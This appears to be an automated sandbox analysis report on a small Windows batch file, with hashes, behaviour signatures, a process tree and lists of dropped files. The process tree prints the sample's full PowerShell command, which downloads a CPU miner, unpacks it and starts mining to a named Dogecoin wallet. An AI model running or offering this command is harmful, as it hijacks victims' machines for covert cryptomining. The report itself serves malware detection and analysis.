b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
146s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
03/02/2024, 00:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	4384	powershell.exe
9	4384	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2244	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4384	powershell.exe
4384	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4384	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5308 wrote to memory of 4384	5308	cmd.exe	86
PID 5308 wrote to memory of 4384	5308	cmd.exe	86
PID 4384 wrote to memory of 3736	4384	powershell.exe	98
PID 4384 wrote to memory of 3736	4384	powershell.exe	98
PID 3736 wrote to memory of 2244	3736	cmd.exe	100
PID 3736 wrote to memory of 2244	3736	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2244

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_50jugqcu.g32.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
581KB

MD5
2c9a5397209b6c5f52f4b2e1d198eebe

SHA1
a570eca22329e6d846dde69dbf2b0c355d0444ad

SHA256
42626f52eae20628334317179de7b83aa2ff7a5aa72f75afee8b1afaa7a7c702

SHA512
1f3962f9aa79dbdddf05927df66a42c92d3ed66136e04f7f3194aa321f2290bff94c5f0c0baeb8ce9315bbd7d01669c9eee50bb61f9d45c2c46d3f43acca2c74

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
857KB

MD5
82c74c7cb4fa790994c6aadab88b31b1

SHA1
5f23ed31a09a98b762a4055d1a4f87c8c75d8f30

SHA256
32eca4aefbf4e060865628a7335e9da85ec6258dd1135f7f249a23bf2d5c12c8

SHA512
c2fcab7fcc51e6aca9d2d1ff29dfac6b82061a6f07c7013ea182e73a7c83cd7612f068b1d7d78364de07664df971944c8bfef801982148d28c6511d6c7415d90

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
648KB

MD5
fc6242b3e580e5ff55c630021e86cc72

SHA1
1addeefbdefe14dcc2d5be51d31651d34527af9e

SHA256
9182c987be9877854b0a1e8487554479a85f1f54317155cc953a1b0dc716cfc1

SHA512
278487cac9aefc91a3d10b84a35cc1ed0babbd38ed7d1506d16f01a8ac35fcf707b498ba5f0157680a46826e72d47fc1d6bb16a41a422db3259f3ec389b1347e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
547KB

MD5
ea908ffad71c759392a12ebb38d38d6c

SHA1
9f78a8525683cde73bf4dfec2a98e5c03c6bf3ec

SHA256
7d3c5ea24341964e7d95f786642ac42aa688ae9bb98295c5f0614754fdf6a4d1

SHA512
b5963ae101588082ef7d7218f0a0d94c7ad9c682b171f969f740a6c1a8b53b1502923ee8e59c1a8cdee7f552a5e6ae873b72454b695bf9f9ff2f08a162072c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
701KB

MD5
25326140e02fcc77f4d9769031f5fce8

SHA1
3908870958f7722f62e94816c4dd0b8cd5dcc6e1

SHA256
f7034d33dfd718ea5827e7f3a8bb14e54e804bb48aa2610b776deffe4c7f5aae

SHA512
df63b2d33cc3ae1c552dc167bb95e37b037fdaf28ae05d613f6eff35c27c0e172f845387c2d54adf393b73693e8bff8f0b4f2035b47f179f66eaf4a77119a203

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
538KB

MD5
891a7a094cfd970f1df89cb29a262a28

SHA1
c4fba6a2a9f4dcde91672ca7e214d673658c0bb4

SHA256
9ee747ce3e182174c41183b9bd7a3257854f438a90c0bac6580f37e2b0eb20d7

SHA512
385ad2c34ac85a2223072bd182de61e0f9aba09b6a6fefdfdf1ca6a3af7b1a3aba32baf92d1f338508ed1153f9ee4602fd4594326403370b54c21b921312cb3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
672KB

MD5
3cd729fa1c6dfaefe2f80f250465ce16

SHA1
331fc7afa04b2bc1c32dc95e2c30b9c5407b8482

SHA256
3c1ec78d4825f233420ac985c1fb25ba94080fa68ae118fef854dfe6e9e564a3

SHA512
f8118b63f16a2737d1acd105e48ae0abc73d40c9393d30ca9771522d309af8c9f66cfa4cb411741efef6cf7bc78c21270f0d25fdae9e43359dad0b4380a3698f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
607KB

MD5
eb94492fe868e71876df5ee48e3b42ae

SHA1
1239c2a6b8edf4e863de520e066778fc25cd4efe

SHA256
137718b56139270d7d42f0a1d4b93bd664a77b7de0920f495e5df3369b0f5c84

SHA512
79a5a640527ec5a7bc47cc7371de865d0d018863bbcbb2c89217ed0976a7cec1cc95342eaaa3bbf9d731a06bea656b90f1ff9ccdc07463668994beffc0b4de5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
519KB

MD5
e1d0898320303fd8fda4e28632e23980

SHA1
6da6e739787c502ede458ab40e9e728365d42ddc

SHA256
267e161fd372bb8804ec01cea568f75ccb885272eee23beeb0d6422eb1e36229

SHA512
d844f45f840db51f7b6f0db336199b525ec9eba7a65b31a4bc47fcad88204b6f23408442a56be5d7ac106238900bdb4a6393b3016e2bec4c7a1d0f5cad4c99bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
586KB

MD5
1e69a59505141489ae53aec60662c648

SHA1
7f5615e6b50a03078d6bf333635c8920659ce0af

SHA256
ab00352deca9bc0e6953336418d7fa23cd24223859c10f6003b10125b8e78c90

SHA512
6d73aee093921efca4041dfaffde1f74bcd7093526fe03486a97ff6ba4b5b1fdabe6a82f70df5312260895ac0407044b444e95beb219e5424673bf503d84cf90

Download Submit
memory/2244-77-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/2244-91-0x000000005FC20000-0x000000005FCB8000-memory.dmp

Filesize
608KB

Download
memory/2244-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-118-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-90-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2244-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-76-0x000000005FC20000-0x000000005FCB8000-memory.dmp

Filesize
608KB

Download
memory/2244-75-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2244-74-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2244-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4384-15-0x000001E5DD730000-0x000001E5DD746000-memory.dmp

Filesize
88KB

Download
memory/4384-21-0x000001E5F6480000-0x000001E5F6492000-memory.dmp

Filesize
72KB

Download
memory/4384-13-0x00007FFF420D0000-0x00007FFF42B91000-memory.dmp

Filesize
10.8MB

Download
memory/4384-0-0x000001E5F5890000-0x000001E5F5922000-memory.dmp

Filesize
584KB

Download
memory/4384-12-0x000001E5F64B0000-0x000001E5F65BE000-memory.dmp

Filesize
1.1MB

Download
memory/4384-14-0x000001E5DD6D0000-0x000001E5DD6E0000-memory.dmp

Filesize
64KB

Download
memory/4384-16-0x00007FFF420D0000-0x00007FFF42B91000-memory.dmp

Filesize
10.8MB

Download
memory/4384-1-0x000001E5DD680000-0x000001E5DD6A2000-memory.dmp

Filesize
136KB

Download
memory/4384-11-0x000001E5DD670000-0x000001E5DD680000-memory.dmp

Filesize
64KB

Download
memory/4384-17-0x000001E5DD6D0000-0x000001E5DD6E0000-memory.dmp

Filesize
64KB

Download
memory/4384-18-0x000001E5DD6D0000-0x000001E5DD6E0000-memory.dmp

Filesize
64KB

Download
memory/4384-20-0x000001E5DD6D0000-0x000001E5DD6E0000-memory.dmp

Filesize
64KB

Download
memory/4384-22-0x000001E5DD750000-0x000001E5DD75A000-memory.dmp

Filesize
40KB

Download
memory/4384-60-0x00007FFF420D0000-0x00007FFF42B91000-memory.dmp

Filesize
10.8MB

Download